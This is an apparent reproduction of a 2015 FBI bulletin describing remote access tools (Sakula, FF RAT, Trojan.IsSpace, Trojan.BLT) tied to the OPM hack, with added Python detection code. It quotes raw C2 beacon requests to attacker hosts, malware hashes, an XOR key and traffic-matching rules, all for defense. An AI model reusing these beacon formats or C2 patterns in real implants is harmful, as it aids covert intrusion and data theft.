FBI Cyber Division Bulletin on Tools Reportedly Used by OPM Hackers

The following bulletin was released to private industry partners on June 5, 2015. According to an article from Reuters, one of the remote access tools (RATs) described in the bulletin, called Sakula, is directly linked to the hack of the Office of Personnel Management (OPM) disclosed earlier this month. Other publications have also linked the bulletin to the OPM hack, though they have not made the bulletin publicly available.

FBI-HackToolsOPM

FBI Cyber Division

  • 7 pages
  • TLP: GREEN
  • June 5, 2015


The FBI is providing the following information with HIGH confidence:

The FBI has obtained information regarding cyber actors who have compromised and stolen sensitive business information and Personally Identifiable Information (PII). Information obtained from victims indicates that PII was a priority target. The FBI notes that stolen PII has been used in other instances to target or otherwise facilitate various malicious activities such as financial fraud, though the FBI is not aware of such activity by these groups. Any activity related to these groups detected on a network should be considered an indication of a compromise requiring extensive mitigation and contact with law enforcement.

Technical Details

The FBI is providing the following information with HIGH confidence:

Groups responsible for these activities have been observed across a variety of intrusions leveraging a diverse selection of tools and techniques to gain initial access to a victim, including the use of credentials acquired during previous intrusions. These groups have also been observed gaining access through DNS hijacking, facilitated by compromising DNS registrars.

Following such initial access, these groups have recently been observed using custom Remote Access Tools (RATs).

Sakula – A RAT that can launch remote command shells, enumerate processes, download files, and beacon to Command and Control (C2) domains. Sakula attempts to send a two-beacon set (a POST followed by a GET, shown below) over TCP port 80 to a configured domain. If that domain is unavailable, it will attempt to connect to a secondary domain over TCP ports 80 and 443 using HTTP.

Specific Sakula MD5 hash values are attached in the accompanying Excel spreadsheet.

Beaconing

POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=93863828&nmsg=up HTTP/1.1
Accept: */*
User-Agent: iexplorer
Host: [varies]
Content-Length: 173
Cache-Control: no-cache

GET /photo/ivpgvz2085205250.jpg?resid=93864218 HTTP/1.1
User-Agent: iexplorer
Host: [varies]
Cache-Control: no-cache

The following are the URI format strings (note the printf-style %s and %d placeholders), User-Agent, and example POST and GET requests for the secondary C2 domain:

GET /newimage.asp?imageid=
POST /view.asp?cstring=
POST /view.asp?cstring=%s&tom=0&id=
POST /script.asp?imageid=
GET /photo/%s.jpg?id=%d
POST /viewpre.asp?cstring=
User-Agent: HttpDump 1.1

POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=100391156&nmsg=up HTTP/1.1
Accept: */*
User-Agent: iexplorer
Host: [varies]
Content-Length: 173
Cache-Control: no-cache

GET /photo/ivpgvz2085205250.jpg?resid=100391156 HTTP/1.1
User-Agent: iexplorer
Host: [varies]

FF RAT – a RAT that can download Trojan DLL files into memory and beacon back to C2 domains. It was named after the unique string "FF-RAT USER" found within the malware. The data sent in the beacon is XOR-encoded with the single-byte key 0x27.
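The XOR encoding above is trivial to undo once the key is known, and with a captured beacon the key can also be confirmed from the data alone. The following is an added example, not code from the bulletin: it decodes a beacon with the bulletin's key 0x27 and recovers that key by trying all 256 single-byte values and ranking the results by how text-like they are. The beacon plaintext used is a constructed, hypothetical host-inventory string; nothing about FF RAT's real payload format is assumed beyond the single-byte XOR.

```python
"""XOR-decode FF RAT style beacon data and recover the single-byte key.

Added example, not code from the bulletin. SAMPLE_PLAINTEXT is constructed;
only the key value 0x27 comes from the bulletin.
"""

FF_RAT_KEY = 0x27  # single-byte XOR key named in the bulletin


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key for b in data)


def text_score(data: bytes) -> float:
    """Score how much a byte string looks like readable ASCII text.

    Spaces and alphanumerics are rewarded, other printable bytes count a
    little, and control or high bytes are penalised hard. The heavy weight
    on spaces is what separates the real key from neighbours that differ in
    one low bit: those keep most letters readable but turn every space into
    punctuation.
    """
    score = 0.0
    for b in data:
        if b == 0x20:
            score += 3
        elif 0x61 <= b <= 0x7A or 0x41 <= b <= 0x5A or 0x30 <= b <= 0x39:
            score += 1
        elif 0x20 < b < 0x7F or b in (0x09, 0x0A, 0x0D):
            score += 0.2
        else:
            score -= 10
    return score


def recover_single_byte_key(ciphertext: bytes) -> list[tuple[int, float]]:
    """Try all 256 keys and return (key, score) pairs, best candidate first."""
    ranked = [(k, text_score(xor_bytes(ciphertext, k))) for k in range(256)]
    ranked.sort(key=lambda ks: ks[1], reverse=True)
    return ranked


def decode_ff_rat_beacon(beacon: bytes, key: int = FF_RAT_KEY) -> bytes:
    """Decode beacon bytes with the bulletin's key (or a recovered one)."""
    return xor_bytes(beacon, key)


# Constructed beacon plaintext (hypothetical host inventory, not a real sample).
SAMPLE_PLAINTEXT = b"host=WS01-FIN user=jdoe os=Windows 7 Professional x64 ip=10.20.30.40 id=1001"
SAMPLE_BEACON = xor_bytes(SAMPLE_PLAINTEXT, FF_RAT_KEY)


if __name__ == "__main__":
    best_key, best_score = recover_single_byte_key(SAMPLE_BEACON)[0]
    print(f"best key: 0x{best_key:02x} (score {best_score:.1f})")
    print(decode_ff_rat_beacon(SAMPLE_BEACON, best_key).decode())
```

Key recovery by printability alone is not enough: a key that differs from the true one in a low bit still yields mostly printable output, so the scorer weights spaces and letters rather than just counting printable bytes. On real captures, confirm the top candidate by checking that the decoded data parses as whatever structure the beacon is expected to carry.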

Trojan.IsSpace – a RAT composed of multiple files: a dropper (EWSNH.exe), the Trojan itself (AOFVPMJXVT.exe), a privilege escalation tool (SensrSvc2013.exe), and a module used by that tool (SensrSvc2013.dll). This malware is capable of bypassing dynamic DNS (dyndns) categorization by proxying its traffic through Google AppProxy hosted on appspot domains.

Filename: EWSNH.exe
MD5: bfdbf09072b58e90aef726c2d1ecf8b7
File Size (bytes): 1990136

Filename: AOFVPMJXVT.exe
MD5: 25631f5ccec8f155a8760b8568ca22c5
File Size (bytes): 63488

Filename: SensrSvc2013.exe
MD5: 38f29e955b76de69c8e97f4491202b8b
File Size (bytes): 197120

Filename: <VARIES>.tmp / SensrSvc2013.dll / CRYPTBASE.dll
MD5: 75416711fc782a3e2a2b54c4b86677bf
File Size (bytes): 42496
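The file sizes and MD5 hashes above are the most direct host-based indicators for Trojan.IsSpace, and because the DLL component is dropped under varying names, matching should not depend on file name. The following is an added example, not code from the bulletin: a scanner that walks a directory tree, hashes only files whose exact size appears in the IOC table, and reports size-and-hash matches. The demo function builds a throwaway tree with constructed files and a constructed IOC entry (the MD5 of b"hello"), since the bulletin's hashes cannot be reproduced without the samples.

```python
"""Hunt a directory tree for the Trojan.IsSpace components listed above.

Added example, not code from the bulletin. Matching uses the MD5/size pairs
from the bulletin rather than file names, because the DLL component is
dropped under varying names (<VARIES>.tmp, SensrSvc2013.dll, CRYPTBASE.dll).
"""
import hashlib
import os
import stat
import tempfile

# MD5 -> size in bytes, copied from the bulletin.
ISSPACE_IOCS = {
    "bfdbf09072b58e90aef726c2d1ecf8b7": 1990136,  # EWSNH.exe (dropper)
    "25631f5ccec8f155a8760b8568ca22c5": 63488,    # AOFVPMJXVT.exe (Trojan)
    "38f29e955b76de69c8e97f4491202b8b": 197120,   # SensrSvc2013.exe (privilege escalation)
    "75416711fc782a3e2a2b54c4b86677bf": 42496,    # SensrSvc2013.dll / CRYPTBASE.dll / <VARIES>.tmp
}


def md5_of(path: str, chunk_size: int = 1 << 20) -> str:
    """MD5 of a file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root: str, iocs: dict[str, int] = ISSPACE_IOCS) -> list[tuple[str, str]]:
    """Return (path, md5) for every regular file whose size and MD5 match an IOC.

    The size check comes first: only files whose exact size appears in the
    IOC table are hashed, which keeps the scan cheap on large volumes.
    """
    sizes_of_interest = set(iocs.values())
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the scan
            if not stat.S_ISREG(st.st_mode) or st.st_size not in sizes_of_interest:
                continue
            digest = md5_of(path)
            if iocs.get(digest) == st.st_size:
                hits.append((path, digest))
    return hits


def demo_scan() -> list[str]:
    """Build a throwaway tree of constructed files and return the matched names.

    The IOC table here is constructed (MD5 of b"hello", size 5); the bulletin's
    hashes cannot be reproduced without the actual malware samples.
    """
    demo_iocs = {hashlib.md5(b"hello").hexdigest(): 5}
    with tempfile.TemporaryDirectory() as root:
        files = {
            "match.bin": b"hello",    # right size, right hash: reported
            "decoy.bin": b"world",    # right size, wrong hash: hashed but not reported
            "other.bin": b"hello!!",  # wrong size: never hashed
        }
        for name, content in files.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(content)
        return sorted(os.path.basename(p) for p, _ in scan_tree(root, demo_iocs))


if __name__ == "__main__":
    print(demo_scan())             # ['match.bin']
    print(scan_tree(os.getcwd()))  # bulletin IOC table against the current directory
```

Symlinks are skipped via os.lstat so a planted link cannot steer the scan out of the tree, and files that disappear mid-scan are skipped rather than aborting the run. Run scan_tree against the paths where the dropper and its components would land (user temp and profile directories are the usual first stop) and escalate any hit per the bulletin's guidance.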

Protocol variations in the URI:

SSports.asp?HostID=
SWeather.asp?HostID=&PackNo=
SJobs.asp?HostID=
STravel.asp?HostID=
SGames.asp?HostID=
SNews.asp?HostID=
STTip.asp

Trojan.BLT – a RAT that is executed via its export CreateInstance. On execution it creates the mutex HFRM_ and launches a cmd.exe process to run the command "ipconfig/all" to collect the victim system's MAC address. Trojan.BLT tests network connectivity by establishing a connection to a legitimate website. This malware is capable of bypassing dynamic DNS (dyndns) categorization by proxying its traffic through Google AppProxy hosted on appspot domains.

Trojan.BLT validates the connection by checking for the HTTP header "Service:IIS", and then conducts further C2 activity.

Beaconing:

POST /fetch.py HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snecma-secure.appspot.com
Content-Length: 56
Connection: Close

POST /asp/STTip.asp HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: facebook.from-pr.com
Content-Length: 11
Connection: Close

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.microsoft.com
Cache-Control: no-cache
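The beacons quoted for Sakula (primary and secondary C2), the S*.asp?HostID= URI family listed for Trojan.IsSpace, and the Trojan.BLT requests above share a few network-visible traits that are easy to match on a proxy or IDS log: User-Agent strings no real browser sends ("iexplorer", "HttpDump 1.1", and the MSIE 7.0 string with no space before "Windows"), fixed URI shapes, and POSTs to appspot.com. The following is an added example, not code from the bulletin, serving all three passages: it parses raw HTTP requests, applies one rule per indicator, and pairs Sakula's two-beacon set (the POST /script.asp?imageid=X followed by GET /photo/X.jpg). The sample requests are constructed from the quoted beacons; Host values other than the bulletin's own are placeholders.

```python
"""Match raw HTTP requests against the C2 beacon shapes quoted in the bulletin
for Sakula, Trojan.IsSpace and Trojan.BLT, and pair Sakula's two-beacon set.

Added example, not code from the bulletin. SAMPLES are constructed from the
quoted beacons; "c2.example" is a placeholder host.
"""
import re
from typing import Callable

Request = dict


def parse_request(raw: str) -> Request:
    """Split a raw HTTP request into method, path, query string and headers."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.strip().splitlines()
    method, target = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query, "headers": headers}


# User-Agent strings quoted for Sakula: neither is sent by any real browser.
SAKULA_UAS = {"iexplorer", "HttpDump 1.1"}
# Method, path and query shapes quoted for the primary beacon and secondary C2.
SAKULA_URIS = [
    ("POST", re.compile(r"/script\.asp$"), re.compile(r"^imageid=\w+(&\w+=\w*)*$")),
    ("GET", re.compile(r"/photo/\w+\.jpg$"), re.compile(r"^(resid|id)=\d+$")),
    ("GET", re.compile(r"/newimage\.asp$"), re.compile(r"^imageid=")),
    ("POST", re.compile(r"/view(pre)?\.asp$"), re.compile(r"^cstring=")),
]
# S*.asp?HostID= family listed for Trojan.IsSpace; STTip.asp also appears in
# the Trojan.BLT beacon.
ASP_C2_PATH = re.compile(r"/S(Sports|Weather|Jobs|Travel|Games|News|TTip)\.asp$")
BLT_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
# The connectivity-check UA as quoted has no space after ';' before "Windows";
# a genuine IE 7 never sends that, so the exact string is the indicator.
BLT_CHECK_UA = "Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)"


def sakula_uri(r: Request) -> bool:
    return any(r["method"] == m and p.search(r["path"]) and q.search(r["query"])
               for m, p, q in SAKULA_URIS)


RULES: list[tuple[str, Callable[[Request], bool]]] = [
    ("sakula-user-agent", lambda r: r["headers"].get("user-agent") in SAKULA_UAS),
    ("sakula-c2-uri", sakula_uri),
    ("asp-hostid-c2-uri", lambda r: bool(ASP_C2_PATH.search(r["path"]))
        and (r["query"].startswith("HostID=") or r["path"].endswith("/STTip.asp"))),
    ("blt-appspot-proxy", lambda r: r["method"] == "POST" and r["path"] == "/fetch.py"
        and r["headers"].get("host", "").endswith(".appspot.com")
        and r["headers"].get("user-agent") == BLT_UA),
    ("blt-connectivity-check-ua", lambda r: r["headers"].get("user-agent") == BLT_CHECK_UA),
]


def classify(raw: str) -> list[str]:
    """Names of every rule the request matches (empty list = nothing seen)."""
    req = parse_request(raw)
    return [name for name, test in RULES if test(req)]


def sakula_beacon_sets(raws: list[str]) -> list[tuple[int, int]]:
    """Pair each POST /script.asp?imageid=X with the later GET /photo/X.jpg.

    Returns (post_index, get_index) pairs; an unmatched POST or GET is ignored.
    """
    pending: dict[str, int] = {}
    pairs = []
    for i, raw in enumerate(raws):
        req = parse_request(raw)
        params = dict(kv.split("=", 1) for kv in req["query"].split("&") if "=" in kv)
        if req["method"] == "POST" and req["path"].endswith("/script.asp") and "imageid" in params:
            pending[params["imageid"]] = i
            continue
        m = re.search(r"/photo/(\w+)\.jpg$", req["path"])
        if m and req["method"] == "GET" and m.group(1) in pending:
            pairs.append((pending.pop(m.group(1)), i))
    return pairs


CRLF = "\r\n"
SAMPLES = {  # constructed from the beacons quoted in the bulletin
    "sakula_post": CRLF.join([
        "POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=93863828&nmsg=up HTTP/1.1",
        "Accept: */*", "User-Agent: iexplorer", "Host: c2.example",
        "Content-Length: 173", "Cache-Control: no-cache", "", ""]),
    "sakula_get": CRLF.join([
        "GET /photo/ivpgvz2085205250.jpg?resid=93864218 HTTP/1.1",
        "User-Agent: iexplorer", "Host: c2.example", "Cache-Control: no-cache", "", ""]),
    "isspace": CRLF.join([
        "GET /SWeather.asp?HostID=WS01-FIN&PackNo=3 HTTP/1.1",
        "User-Agent: " + BLT_UA, "Host: c2.example", "", ""]),
    "blt_fetch": CRLF.join([
        "POST /fetch.py HTTP/1.1", "Accept: */*", "Cache-Control: no-cache",
        "User-Agent: " + BLT_UA, "Host: snecma-secure.appspot.com",
        "Content-Length: 56", "Connection: Close", "", ""]),
    "benign": CRLF.join([
        "GET / HTTP/1.1", "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Firefox/38.0",
        "Host: www.microsoft.com", "", ""]),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:12s} -> {classify(raw)}")
    print("sakula pairs:", sakula_beacon_sets([SAMPLES["sakula_post"], SAMPLES["sakula_get"]]))
```

The User-Agent rules are the high-value ones: they fire on their own regardless of C2 domain, which matters because the bulletin notes the Host varies. The BLT connectivity check goes to www.microsoft.com, so matching on destination alone would be useless there; the malformed UA string is what distinguishes it from ordinary browsing, and a hit on it should be correlated with a nearby POST to an appspot.com host or to an STTip.asp URI rather than acted on alone.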
